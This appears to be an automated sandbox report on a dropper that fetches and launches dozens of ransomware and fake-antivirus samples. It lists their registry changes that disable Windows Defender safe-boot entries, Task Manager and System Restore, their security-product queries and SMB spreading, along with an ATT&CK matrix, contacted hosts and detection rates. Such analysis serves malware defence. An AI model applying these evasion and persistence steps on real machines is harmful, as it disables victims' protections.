        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exeCode function: 3_2_0040B01C GetLocalTime,3_2_0040B01C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A457E5 LocalAlloc,GetSystemDefaultLCID,GetTimeZoneInformation,memcpy,NetWkstaGetInfo,memcpy,memcpy,NetApiBufferFree,LocalAlloc,memcpy,LocalFree,LocalFree,4_2_04A457E5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A46FFE GetProcessHeap,GetProcessHeap,HeapAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,ConnectNamedPipe,PeekNamedPipe,Sleep,GetProcessHeap,HeapAlloc,ReadFile,StrChrW,GetProcessHeap,HeapFree,FlushFileBuffers,DisconnectNamedPipe,CloseHandle,4_2_04A46FFE
        Source: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exeCode function: 3_2_00405435 GetCommandLineA,GetVersion,GetVersion,GetThreadLocale,GetThreadLocale,GetCurrentThreadId,3_2_00405435

        Lowering of HIPS / PFW / Operating System Security Settings

        barindex
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\system32\netsh.exe advfirewall set allprofiles state on
        Source: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exeRegistry key or value deleted: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\WinDefendJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exeRegistry key or value deleted: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\WinDefendJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\bxkda0t5.zem\Endermanch@Krotten.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableRegistryTools
        Source: C:\Users\user\AppData\Local\Temp\bxkda0t5.zem\Endermanch@Krotten.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SystemRestore DisableSR
        Source: C:\Users\user\AppData\Local\Temp\bxkda0t5.zem\Endermanch@Krotten.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgr
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\system32\netsh.exe advfirewall set allprofiles state on
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : select * from FirewallProduct
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : select * from FirewallProduct
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : select * from AntiSpywareProduct
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : select * from AntiSpywareProduct
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : select * from AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : select * from AntiVirusProduct
        Source: Endermanch@Krotten.exe, 00000020.00000002.564574975.0000000000430000.00000004.00001000.00020000.00000000.sdmp, Endermanch@Krotten.exe.0.drBinary or memory string: C:\WINDOWS\Cursors\avp.exe
        Source: Endermanch@Krotten.exe, 00000020.00000002.564574975.0000000000430000.00000004.00001000.00020000.00000000.sdmp, Endermanch@Krotten.exe.0.drBinary or memory string: Photo.exeC:\WINDOWS\Cursors\avp.exe

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: 13.0.Fantom.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.0.Fantom.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.0.Fantom.exe.400000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.0.Fantom.exe.400000.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.Fantom.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exe, type: DROPPED
        Source: Yara matchFile source: 21.0.DCD7.tmp.7ff629520000.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.0.DCD7.tmp.7ff629520000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.0.DCD7.tmp.7ff629520000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.2.DCD7.tmp.7ff629520000.0.unpack, type: UNPACKEDPE
        Source: C:\Windows\SysWOW64\rundll32.exeFile opened: \\192.168.2.1\admin$\infpub.datJump to behavior

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: 13.0.Fantom.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.0.Fantom.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.0.Fantom.exe.400000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.0.Fantom.exe.400000.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.Fantom.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exe, type: DROPPED
        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        1
        Valid Accounts
        111
        Windows Management Instrumentation
        1
        DLL Side-Loading
        1
        DLL Side-Loading
        611
        Disable or Modify Tools
        1
        Input Capture
        2
        System Time Discovery
        1
        Replication Through Removable Media
        11
        Archive Collected Data
        Exfiltration Over Other Network Medium4
        Ingress Tool Transfer
        Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
        Data Encrypted for Impact
        1
        Replication Through Removable Media
        1
        Scripting
        1
        Valid Accounts
        1
        Valid Accounts
        1
        Deobfuscate/Decode Files or Information
        LSASS Memory11
        Peripheral Device Discovery
        Remote Desktop Protocol2
        Man in the Browser
        Exfiltration Over Bluetooth21
        Encrypted Channel
        Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without Authorization11
        System Shutdown/Reboot
        Domain Accounts2
        Native API
        22
        Windows Service
        11
        Access Token Manipulation
        1
        Scripting
        Security Account Manager2
        File and Directory Discovery
        SMB/Windows Admin Shares1
        Input Capture
        Automated Exfiltration1
        Non-Standard Port
        Exploit SS7 to Track Device LocationObtain Device Cloud Backups3
        Inhibit System Recovery
        Local Accounts1
        Command and Scripting Interpreter
        1
        Scheduled Task/Job
        22
        Windows Service
        31
        Obfuscated Files or Information
        NTDS248
        System Information Discovery
        Distributed Component Object ModelInput CaptureScheduled Transfer3
        Non-Application Layer Protocol
        SIM Card SwapCarrier Billing Fraud
        Cloud Accounts1
        Scheduled Task/Job
        21
        Registry Run Keys / Startup Folder
        113
        Process Injection
        241
        Software Packing
        LSA Secrets3
        Network Share Discovery
        SSHKeyloggingData Transfer Size Limits4
        Application Layer Protocol
        Manipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable Media12
        Service Execution
        3
        Bootkit
        1
        Scheduled Task/Job
        1
        DLL Side-Loading
        Cached Domain Credentials341
        Security Software Discovery
        VNCGUI Input CaptureExfiltration Over C2 Channel1
        Proxy
        Jamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup Items21
        Registry Run Keys / Startup Folder
        1
        File Deletion
        DCSync21
        Virtualization/Sandbox Evasion
        Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job221
        Masquerading
        Proc Filesystem3
        Process Discovery
        Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
        Valid Accounts
        /etc/passwd and /etc/shadow21
        Remote System Discovery
        Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
        Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
        Modify Registry
        Network Sniffing11
        System Network Configuration Discovery
        Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
        Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron21
        Virtualization/Sandbox Evasion
        Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
        Compromise Software Supply ChainUnix ShellLaunchdLaunchd11
        Access Token Manipulation
        KeyloggingLocal GroupsComponent Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery
        Compromise Hardware Supply ChainVisual BasicScheduled TaskScheduled Task113
        Process Injection
        GUI Input CaptureDomain GroupsExploitation of Remote ServicesEmail CollectionCommonly Used PortProxyDefacement
        Trusted RelationshipPythonHypervisorProcess Injection1
        Hidden Files and Directories
        Web Portal CaptureCloud GroupsAttack PC via USB ConnectionLocal Email CollectionStandard Application Layer ProtocolInternal ProxyInternal Defacement
        Hardware AdditionsJavaScript/JScriptValid AccountsDynamic-link Library Injection3
        Bootkit
        Credential API HookingSystem Information DiscoveryExploit Enterprise ResourcesRemote Email CollectionAlternate Network MediumsExternal ProxyExternal Defacement
        Masquerade as Legitimate ApplicationGraphical User InterfaceDefault AccountsPortable Executable Injection1
        Rundll32
        Brute ForceFile and Directory DiscoveryInternal SpearphishingEmail Forwarding RuleData EncryptedMulti-hop ProxyFirmware Corruption
        Drive-by CompromiseScriptingDomain AccountsThread Execution Hijacking2
        Indicator Removal on Host
        Password GuessingAccount DiscoveryUse Alternate Authentication MaterialClipboard DataTransfer Data to Cloud AccountDomain FrontingResource Hijacking
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 712614 Sample: 4W5dQXszUV.exe Startdate: 29/09/2022 Architecture: WINDOWS Score: 100 124 www5.internet-security-guard.com 2->124 126 secure2.simplenetworkzqi.com 2->126 128 7 other IPs or domains 2->128 142 Snort IDS alert for network traffic 2->142 144 Malicious sample detected (through community Yara rule) 2->144 146 Antivirus detection for dropped file 2->146 148 16 other signatures 2->148 10 4W5dQXszUV.exe 14 36 2->10         started        15 cmd.exe 2->15         started        17 svchost.exe 2->17         started        signatures3 process4 dnsIp5 132 raw.githubusercontent.com 10->132 134 github.com 10->134 116 C:\Users\user\...ndermanch@DeriaLock.exe, PE32 10->116 dropped 118 C:\Users\...ndermanch@AntivirusPro2017.exe, PE32 10->118 dropped 120 C:\Users\user\...ndermanch@Petya.A.exe, PE32 10->120 dropped 122 37 other malicious files 10->122 dropped 200 Writes many files with high entropy 10->200 19 Endermanch@BadRabbit.exe 2 10->19         started        23 Endermanch@PolyRansom.exe 10->23         started        25 Endermanch@InfinityCrypt.exe 10->25         started        31 8 other processes 10->31 202 Drops executables to the windows directory (C:\Windows) and starts them 15->202 27 dispci.exe 15->27         started        29 conhost.exe 15->29         started        file6 signatures7 process8 dnsIp9 98 C:\Windows\infpub.dat, data 19->98 dropped 168 Multi AV Scanner detection for dropped file 19->168 34 rundll32.exe 1 3 19->34         started        38 conhost.exe 19->38         started        100 C:\Users\user\yeYUggIg\rCUUIQEQ.exe, PE32 23->100 dropped 102 C:\ProgramData\sWAsokQQ\wKAwMsck.exe, PE32 23->102 dropped 170 Uses cmd line tools excessively to alter registry or file data 23->170 172 Creates multiple autostart registry keys 23->172 174 Tries to evade debugger and weak emulator (self modifying code) 23->174 176 Tries to detect virtualization through RDTSC time measurements 23->176 40 wKAwMsck.exe 23->40         started        43 rCUUIQEQ.exe 23->43         started        51 5 other processes 23->51 104 en_GB.aff.5539DE8C...990C50187DD2E003671, data 25->104 dropped 112 10 other malicious files 25->112 dropped 178 Antivirus detection for dropped file 25->178 180 Machine Learning detection for dropped file 25->180 182 Writes many files with high entropy 25->182 45 cmd.exe 27->45         started        47 conhost.exe 27->47         started        136 93.107.12.20, 6893 VODAFONE-IRELAND-ASNIE Ireland 31->136 138 93.107.12.21, 6893 VODAFONE-IRELAND-ASNIE Ireland 31->138 140 97 other IPs or domains 31->140 106 \Device\Harddisk0\DR0, DOS 31->106 dropped 108 C:\Users\user\...108WCXBPIUYI.xlsx.deria, DOS 31->108 dropped 110 C:\Users\user\...110WCXBPIUYI.jpg.deria, DOS 31->110 dropped 114 6 other malicious files 31->114 dropped 184 Detected unpacking (changes PE section rights) 31->184 186 Detected unpacking (overwrites its own PE header) 31->186 188 Creates an undocumented autostart registry key 31->188 190 15 other signatures 31->190 49 cmd.exe 31->49         started        53 3 other processes 31->53 file10 signatures11 process12 dnsIp13 92 C:\Windows\dispci.exe, PE32 34->92 dropped 94 C:\Windows\cscc.dat, PE32+ 34->94 dropped 96 C:\Windows\DCD7.tmp, data 34->96 dropped 150 System process connects to network (likely due to code injection or exploit) 34->150 152 Connects to many different private IPs via SMB (likely to spread or exploit) 34->152 154 Connects to many different private IPs (likely to spread or exploit) 34->154 166 5 other signatures 34->166 55 cmd.exe 1 34->55         started        58 cmd.exe 34->58         started        60 cmd.exe 34->60         started        64 3 other processes 34->64 156 Antivirus detection for dropped file 40->156 158 Machine Learning detection for dropped file 40->158 160 Tries to evade debugger and weak emulator (self modifying code) 40->160 130 google.com 172.217.168.14, 49753, 49755, 49764 GOOGLEUS United States 43->130 162 Tries to detect virtualization through RDTSC time measurements 43->162 66 2 other processes 45->66 164 Uses ping.exe to sleep 49->164 68 3 other processes 49->68 70 5 other processes 51->70 62 conhost.exe 53->62         started        72 2 other processes 53->72 file14 signatures15 process16 signatures17 192 Clears the journal log 55->192 194 Uses ping.exe to sleep 55->194 196 Uses schtasks.exe or at.exe to add and modify task schedules 55->196 198 Uses ping.exe to check the status of other devices and networks 55->198 74 conhost.exe 55->74         started        76 schtasks.exe 1 55->76         started        88 6 other processes 58->88 78 conhost.exe 60->78         started        80 schtasks.exe 60->80         started        82 conhost.exe 64->82         started        84 schtasks.exe 64->84         started        86 conhost.exe 64->86         started        90 2 other processes 64->90 process18

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        4W5dQXszUV.exe64%ReversingLabsWin32.Ransomware.Cerber
        4W5dQXszUV.exe61%VirustotalBrowse
        4W5dQXszUV.exe24%MetadefenderBrowse
        4W5dQXszUV.exe100%AviraTR/Dropper.Gen
        4W5dQXszUV.exe100%Joe Sandbox ML
        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\bxkda0t5.zem\Endermanch@Krotten.exe100%AviraTR/Sirery.A
        C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exe100%AviraTR/Ransom.pfnaw
        C:\Users\user\AppData\Local\Temp\3d3t2wty.l1d\Endermanch@NoMoreRansom.exe100%AviraHEUR/AGEN.1240493
        C:\ProgramData\Windows\csrss.exe100%AviraHEUR/AGEN.1240493
        C:\Users\user\AppData\Local\Temp\dgr2nom5.kbb\Endermanch@WinlockerVB6Blacksod.exe100%AviraTR/AD.Skeeyah.ixvmj
        C:\Users\user\AppData\Local\Temp\etnjaaha.pdu\Endermanch@Xyeta.exe100%AviraTR/Crypt.XPACK.Gen
        C:\Users\user\AppData\Local\Temp\WindowsUpdate.exe100%AviraTR/Ficongur.dngqe
        C:\ProgramData\sWAsokQQ\wKAwMsck.exe100%AviraTR/Crypt.ZPACK.Gen
        C:\Users\user\AppData\Local\Temp\csz4moeg.pyf\Endermanch@WannaCrypt0r.exe100%AviraTR/Ransom.JB
        C:\Users\user\AppData\Local\Temp\bxkda0t5.zem\Endermanch@Krotten.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Temp\3d3t2wty.l1d\Endermanch@NoMoreRansom.exe100%Joe Sandbox ML
        C:\ProgramData\Windows\csrss.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Temp\etnjaaha.pdu\Endermanch@Xyeta.exe100%Joe Sandbox ML
        C:\ProgramData\sWAsokQQ\wKAwMsck.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Temp\csz4moeg.pyf\Endermanch@WannaCrypt0r.exe100%Joe Sandbox ML
        C:\ProgramData\Windows\csrss.exe91%ReversingLabsWin32.Ransomware.Troldesh
        C:\ProgramData\Windows\csrss.exe72%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\3d3t2wty.l1d\Endermanch@NoMoreRansom.exe91%ReversingLabsWin32.Ransomware.Troldesh
        C:\Users\user\AppData\Local\Temp\3d3t2wty.l1d\Endermanch@NoMoreRansom.exe72%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\WindowsUpdate.exe62%ReversingLabsByteCode-MSIL.Trojan.Ficongur
        C:\Users\user\AppData\Local\Temp\WindowsUpdate.exe46%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\bxkda0t5.zem\Endermanch@Krotten.exe96%ReversingLabsWin32.Trojan.Krotten
        C:\Users\user\AppData\Local\Temp\bxkda0t5.zem\Endermanch@Krotten.exe86%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\csz4moeg.pyf\Endermanch@WannaCrypt0r.exe95%ReversingLabsWin32.Ransomware.WannaCry
        C:\Users\user\AppData\Local\Temp\csz4moeg.pyf\Endermanch@WannaCrypt0r.exe88%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exe85%ReversingLabsByteCode-MSIL.Ransomware.Infinity
        C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exe60%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\dgr2nom5.kbb\Endermanch@WinlockerVB6Blacksod.exe45%ReversingLabsWin32.Ransomware.InfinityLock
        C:\Users\user\AppData\Local\Temp\dgr2nom5.kbb\Endermanch@WinlockerVB6Blacksod.exe31%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\etnjaaha.pdu\Endermanch@Xyeta.exe92%ReversingLabsWin32.Downloader.Lofog
        C:\Users\user\AppData\Local\Temp\etnjaaha.pdu\Endermanch@Xyeta.exe63%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\h21abmmw.gcd\Endermanch@AnViPC2009.exe68%ReversingLabsWin32.Rogue.FakeRean
        C:\Users\user\AppData\Local\Temp\h21abmmw.gcd\Endermanch@AnViPC2009.exe24%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\ihramkff.aqi\Endermanch@ViraLock.exe95%ReversingLabsWin32.Ransomware.VirLock
        C:\Users\user\AppData\Local\Temp\ihramkff.aqi\Endermanch@ViraLock.exe83%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\iptzuyxi.lvf\Endermanch@FakeAdwCleaner.exe70%ReversingLabsWin32.Trojan.MintPorcupine
        C:\Users\user\AppData\Local\Temp\iptzuyxi.lvf\Endermanch@FakeAdwCleaner.exe60%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exe95%ReversingLabsWin32.Ransomware.VirLock
        C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exe82%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\kql13vqd.ufc\Endermanch@AntivirusPlatinum.exe78%ReversingLabsWin32.Trojan.Pasta
        C:\Users\user\AppData\Local\Temp\kql13vqd.ufc\Endermanch@AntivirusPlatinum.exe28%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exe86%ReversingLabsWin32.Ransomware.Genasom
        C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exe78%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exe91%ReversingLabsWin32.Ransomware.Cerber
        C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exe76%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\qfvdb0vr.1x3\Endermanch@Antivirus.exe86%ReversingLabsWin32.Trojan.CoreGuardAntivirus2009
        C:\Users\user\AppData\Local\Temp\qfvdb0vr.1x3\Endermanch@Antivirus.exe60%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\sh0cbz1h.c1l\Endermanch@BadRabbit.exe93%ReversingLabsWin32.Ransomware.BadRabbit
        C:\Users\user\AppData\Local\Temp\sh0cbz1h.c1l\Endermanch@BadRabbit.exe83%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\shi2B2E.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\shi2B2E.tmp0%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exe88%ReversingLabsByteCode-MSIL.Ransomware.Fantom
        C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exe66%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\u1k33a3l.310\Endermanch@HappyAntivirus.exe37%ReversingLabsWin32.PUA.HappyAV
        C:\Users\user\AppData\Local\Temp\u1k33a3l.310\Endermanch@HappyAntivirus.exe36%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\vreukf5s.guu\Endermanch@Petya.A.exe100%ReversingLabsWin32.Ransomware.Petya
        C:\Users\user\AppData\Local\Temp\vreukf5s.guu\Endermanch@Petya.A.exe84%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\y5f2j2j3.yr4\Endermanch@AntivirusPro2017.exe92%ReversingLabsWin32.Rogue.FakeRean
        C:\Users\user\AppData\Local\Temp\y5f2j2j3.yr4\Endermanch@AntivirusPro2017.exe64%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exe92%ReversingLabsWin32.Ransomware.Derialock
        C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exe69%MetadefenderBrowse
        C:\Users\user\AppData\Roaming\Windows\Error file remover 1.0.0.0\install\0A01606\fatalerror.exe50%ReversingLabsWin32.Trojan.Johnnie
        C:\Users\user\AppData\Roaming\Windows\Error file remover 1.0.0.0\install\decoder.dll3%ReversingLabs
        C:\Users\user\AppData\Roaming\Windows\Error file remover 1.0.0.0\install\decoder.dll0%MetadefenderBrowse
        C:\Windows\cscc.dat4%ReversingLabs
        C:\Windows\cscc.dat0%MetadefenderBrowse
        C:\Windows\dispci.exe96%ReversingLabsWin32.Ransomware.BadRabbit
        C:\Windows\dispci.exe86%MetadefenderBrowse
        \Device\Harddisk0\DR00%ReversingLabs
        SourceDetectionScannerLabelLinkDownload
        47.0.Endermanch@PolyRansom.exe.400000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
        3.0.Endermanch@Birele.exe.400000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
        5.2.Endermanch@Cerber5.exe.1520000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
        55.0.wKAwMsck.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
        44.2.Endermanch@Petya.A.exe.4e0000.2.unpack100%AviraHEUR/AGEN.1207445Download File
        5.0.Endermanch@Cerber5.exe.400000.1.unpack100%AviraHEUR/AGEN.1227089Download File
        13.0.Fantom.exe.400000.1.unpack100%AviraTR/AD.HiddenTear.huakhDownload File
        62.0.Endermanch@PolyRansom.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
        38.0.Endermanch@NoMoreRansom.exe.400000.0.unpack100%AviraHEUR/AGEN.1240493Download File
        13.0.Fantom.exe.400000.0.unpack100%AviraTR/AD.HiddenTear.huakhDownload File
        1.2.Endermanch@BadRabbit.exe.880000.1.unpack100%AviraTR/ATRAPS.GenDownload File
        5.0.Endermanch@Cerber5.exe.400000.0.unpack100%AviraHEUR/AGEN.1227089Download File
        54.0.rCUUIQEQ.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
        3.2.Endermanch@Birele.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
        1.0.Endermanch@BadRabbit.exe.880000.2.unpack100%AviraTR/ATRAPS.GenDownload File
        1.0.Endermanch@BadRabbit.exe.880000.0.unpack100%AviraTR/ATRAPS.GenDownload File
        5.0.Endermanch@Cerber5.exe.400000.3.unpack100%AviraHEUR/AGEN.1227089Download File
        47.0.Endermanch@PolyRansom.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
        44.0.Endermanch@Petya.A.exe.400000.3.unpack100%AviraTR/Crypt.XPACK.jvzjDownload File
        44.0.Endermanch@Petya.A.exe.400000.2.unpack100%AviraTR/Crypt.XPACK.jvzjDownload File
        3.0.Endermanch@Birele.exe.400000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
        5.2.Endermanch@Cerber5.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen7Download File
        13.0.Fantom.exe.400000.3.unpack100%AviraTR/AD.HiddenTear.huakhDownload File
        3.0.Endermanch@Birele.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
        13.0.Fantom.exe.400000.2.unpack100%AviraTR/AD.HiddenTear.huakhDownload File
        47.0.Endermanch@PolyRansom.exe.400000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
        5.2.Endermanch@Cerber5.exe.5e70000.2.unpack100%AviraTR/Crypt.XPACK.Gen7Download File
